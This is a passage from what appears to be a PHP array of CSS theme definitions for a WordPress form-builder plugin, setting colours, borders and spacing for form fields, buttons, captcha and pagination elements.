      "26" => ".page_numbers {\nmargin-left: 10px;\n}\n .page_percentage_deactive,.page_percentage_deactive * {\nword-wrap: normal !important;\n-moz-box-sizing: content-box !important;\n-webkit-box-sizing: content-box !important;\nbox-sizing: content-box !important;\n}\n .wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:none !important;\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	margin:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2 table, .wdform_table2 tr, .wdform_table2 th{\n	width:inherit !important;\n	vertical-align:top !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_table1 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	text-align:left;\n	margin:inherit !important;\n}\n.wdform_table2 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:top !important;\n	margin:inherit !important;\n	text-align:left;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important;\n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	background-image:inherit !important;\n	padding:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 0px solid black !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#5EA3CC !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth:100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_td1\n{\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 0px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\nbackground-color:#EB3D00 !important;\n}\n.wdform_tr_section_break\n{\ndisplay: table !important;\nwidth: 100% !important;\n}\n.wdform_select\n{\nborder-radius:0px !important;\n}\n.wdform_input input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #5EA3CC !important;\ncolor:#fff !important;\n}\n.wdform_date_fields input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #5EA3CC !important;\ncolor:#fff !important;\n}\n.wdform_date_fields select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #5EA3CC !important;\ncolor:#fff !important;\nheight:20px !important;\n}\n.wdform_select select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #5EA3CC !important;\ncolor:#fff !important;\nheight:20px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #5EA3CC !important;\ncolor:#fff !important;\n}\n.wdform_date\n{\nborder-radius:0px !important;\nheight:16px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #5EA3CC !important;\ncolor:#fff !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:20px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #5EA3CC !important;\ncolor:#fff !important;\n}\n.time_box\n{\nborder-radius:0px !important;\nheight:16px !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\nborder: 1px solid #fff !important;\nbackground-color: #5EA3CC !important;\ncolor:#fff !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #5EA3CC !important;\ncolor:#fff !important;\nheight:20px !important;\n}\n.input_deactive\n{\ncolor:#C4CCE2 !important;\nfont-style:italic !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nborder-radius:0px !important;\nheight:16px;\nbackground-color: #5EA3CC !important;\n}\n.input_active\n{\ncolor:#fff !important;\nfont-style:normal !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nborder-radius:0px !important;\nheight:16px;\nbackground-color: #5EA3CC !important;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\ncolor:#fff !important;\nborder: 1px solid #fff !important;\npadding:0px !important;\nmargin:0px !important;\nborder-radius:0px !important;\nheight:16px !important;\nbackground-color: #5EA3CC !important;\n}\n.file_upload\n{\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\ncolor:#fff !important;\n}    \n.page_deactive\n{\ncolor:#ffffff !important;\nborder:1px solid #ffffff !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 0px !important;\nbackground-color:#5EA3CC !important;\n}\n.page_active\n{\nfont-weight:bold !important;\ncolor:#ffffff !important;\nborder:1px solid #000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#fff !important;\nbackground-color:#E03B01 !important;\nborder-radius: 0px !important;\nbox-shadow: 0px 0px 5px 2px #5EA3CC !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin-bottom: 0px !important;\nborder-spacing: 0px !important;\nheight:25px !important;\nline-height:25px !important;\nbackground-color:#E03B01 !important;\nborder-radius:0px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: 0px 0px 10px #ffffff !important;\n}\n.page_percentage_deactive\n{\nheight:25px !important;\nline-height:25px !important;\nbackground-color:#5EA3CC !important;\nborder-radius:0px !important;\ntext-align: left !important; \npadding:2px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#E03B01 !important;\nborder: 1px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #0078C9 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#E03B01 !important;\nborder: 1px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #0078C9 !important;\n}\nbutton.wdform_page_button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#E03B01 !important;\nborder: 1px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #0078C9 !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.other_input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #5EA3CC !important;\ncolor:#fff !important;\nmargin-left: 25px !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#E03B01 !important;\nborder: 1px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #0078C9 !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nheight:38px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#ffffff !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#ffffff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_map>div\n{\nborder:4px solid #fff !important;\nborder-radius:1px !important;\n}\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_scale_rating span\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading .grading_div\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\nmargin:0 0 3px;\r\ncolor:#FFFFFF;\r\nbackground-color:#000000;\r\nborder:1px solid #FFFFFF;\r\npadding:0 4px;\r\n}\r\n\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#FFFFFF !important;\r\nborder:1px solid #FFFFFF;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-slider-handle, .ui-slider-range{\r\nbackground:#FFFFFF;\r\nborder:1px solid #FFFFFF;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-slider\r\n{\r\nborder:1px solid #FFFFFF;\r\nborder-radius:0px !important;\r\nbackground:none;\r\n}\r\n\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#FFFFFF;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #FFFFFF;\r\nmargin-right:3px !important;\r\nborder-radius:0px !important;\r\nbackground:none;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #FFFFFF;\r\nborder-radius:0px;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\nbackground:none;\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n\r\n}\r\n\r\n.wdform_matrix table td\r\n{\r\nborder:1px solid #FFFFFF;\r\n\r\n}\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input, .wdform_matrix table select\r\n{\r\ncolor:#FFFFFF;\r\nbackground-color:#000000;\r\nborder:1px solid #000000;\r\nmargin:5px 7px;\r\npadding:1px;\r\n}\r\n\r\n.wdform_paypal_total\r\n{\r\ncolor:#ffffff;\r\n}",
      "27" => ".page_numbers {\nmargin-left: 10px;\n}\n .page_percentage_deactive,.page_percentage_deactive * {\nword-wrap: normal !important;\n-moz-box-sizing: content-box !important;\n-webkit-box-sizing: content-box !important;\nbox-sizing: content-box !important;\n}\n .wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:none !important;\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	margin:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2 table, .wdform_table2 tr, .wdform_table2 th{\n	width:inherit !important;\n	vertical-align:top !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_table1 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	text-align:left;\n	margin:inherit !important;\n}\n.wdform_table2 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:top !important;\n	margin:inherit !important;\n	text-align:left;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	background-image:inherit !important;\n	padding:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 0px solid black !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#000000 !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth:100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_td1\n{\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 0px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\nbackground-color:#EB3D00 !important;\n}\n.wdform_tr_section_break\n{\ndisplay: table !important;\nwidth: 100% !important;\n}\n.wdform_select\n{\nborder-radius:0px !important;\n}\n.wdform_input input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\n}\n.wdform_date_fields input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\n}\n.wdform_date_fields select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\nheight:20px !important;\n}\n.wdform_select select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\nheight:20px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\n}\n.wdform_date\n{\nborder-radius:0px !important;\nheight:16px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:20px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\n}\n.time_box\n{\nborder-radius:0px !important;\nheight:16px !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\nborder: 1px solid #fff !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\nheight:20px !important;\n}\n.input_deactive\n{\ncolor:#C4CCE2 !important;\nfont-style:italic !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nborder-radius:0px !important;\nheight:16px;\nbackground-color: #000000 !important;\n}\n.input_active\n{\ncolor:#fff !important;\nfont-style:normal !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nborder-radius:0px !important;\nheight:16px;\nbackground-color: #000000 !important;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\ncolor:#fff !important;\nborder: 1px solid #fff !important;\npadding:0px !important;\nmargin:0px !important;\nborder-radius:0px !important;\nheight:16px !important;\nbackground-color: #000000 !important;\n}\n.file_upload\n{\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\ncolor:#fff !important;\n}    \n.page_deactive\n{\ncolor:#ffffff !important;\nborder:1px solid #ffffff !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 0px !important;\nbackground-color:#000000 !important;\n}\n.page_active\n{\nfont-weight:bold !important;\ncolor:#ffffff !important;\nborder:1px solid #000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#fff !important;\nbackground-color:#E03B01 !important;\nborder-radius: 0px !important;\nbox-shadow: 0px 0px 5px 2px #000000 !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin-bottom: 0px !important;\nborder-spacing: 0px !important;\nheight:25px !important;\nline-height:25px !important;\nbackground-color:#E03B01 !important;\nborder-radius:0px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: 0px 0px 10px #ffffff !important;\n}\n.page_percentage_deactive\n{\nheight:25px !important;\nline-height:25px !important;\nbackground-color:#000000 !important;\nborder-radius:0px !important;\ntext-align: left !important; \npadding:2px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#E03B01 !important;\nborder: 1px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #0078C9 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#E03B01 !important;\nborder: 1px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #0078C9 !important;\n}\nbutton.wdform_page_button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#E03B01 !important;\nborder: 1px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #0078C9 !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.other_input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\nmargin-left: 25px !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#E03B01 !important;\nborder: 1px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #0078C9 !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nheight:38px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#ffffff !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#ffffff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_map>div\n{\nborder:4px solid #fff !important;\nborder-radius:1px !important;\n}\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\nmargin:0 0 3px;\r\ncolor:#000000;\r\nbackground-color:#E7E7E7;\r\nborder:1px solid #999;\r\npadding:0 4px;\r\n}\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#999!important;\r\nborder:1px solid #999;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-slider-handle, .ui-slider-range{\r\nbackground:#999;\r\nborder:1px solid #999;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-slider\r\n{\r\nborder:1px solid #999;\r\nborder-radius:0px !important;\r\nbackground:none;\r\n}\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#999;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#999;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#E7E7E7;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #999;\r\nmargin-right:3px !important;\r\nborder-radius:0px !important;\r\nbackground:none;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #999;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\n\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n\r\n}\r\n\r\n.wdform_matrix table td\r\n{\r\nborder:1px solid #999;\r\n\r\n}\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input, .wdform_matrix table select\r\n{\r\ncolor:#000000;\r\nbackground-color:#E7E7E7;\r\nborder:none;\r\nmargin:5px 7px;\r\n}",
      "28" => ".page_numbers {\nmargin-left: 10px;\n}\n .page_percentage_deactive,.page_percentage_deactive * {\nword-wrap: normal !important;\n-moz-box-sizing: content-box !important;\n-webkit-box-sizing: content-box !important;\nbox-sizing: content-box !important;\n}\n .wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2 table{\n	width:initial !important;\n	text-align:left;\n}\n.wdform_table2 td{\n	vertical-align:top !important;\n        text-align:left;\n}\n.wdform_table1 td{\n	border:inherit !important;\n	padding:inherit !important;\n	text-align:left;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		color:#000;\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:0px !important;\n		padding-bottom:0px !important;\n		padding-left:inherit;\n		padding-right:inherit;\n		display: inline !important;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n	font-size:inherit !important; \n	height:inherit !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n	background-image:none !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 0px solid black !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#ffffff !important;\nborder:0px solid black !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth:100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n//display: table !important;\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 6px !important;\nborder-collapse:separate !important;\nwidth: 700px !important;\n}\n.wdform_tbody2>tr\n{\n}\n.toolbar_padding\n{\nbackground-color:#E0DEE1!important;\ntext-align:left !important;\npadding:6px !important;\n}\n.wdform_table2>tbody>tr>td\n{\nbackground-color:#C9C9C9 !important;\ntext-align:center;\npadding:6px !important;\nwidth:20% !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nbackground-color:#ffffff !important;\nwidth:100% !important;\n}\n.wdform_select\n{\nborder-radius:0px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\nborder: 2px inset !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:19px !important;\nfont-size:12px !important;\nborder: 2px inset !important;\n}\n.wdform_input input\n{\nborder-radius:0px !important;\nborder-width: 1px !important;\npadding:0px !important;\nmargin:0px !important;\nheight:16px !important;\nborder: 2px inset !important;\n}\n.time_box\n{\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\nborder: 2px inset !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#000000 !important;\nfont-weight: bold !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\n}\n.label\n{\nborder:none !important;\ncolor:#000000 !important;\nfont-weight:bolder !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nheight: 20px !important;\nmargin:0 !important;\npadding:0\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder: 2px inset !important;\nmargin: 0px !important;\npadding: 0px !important;\nborder-radius:0px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nmargin: 0px 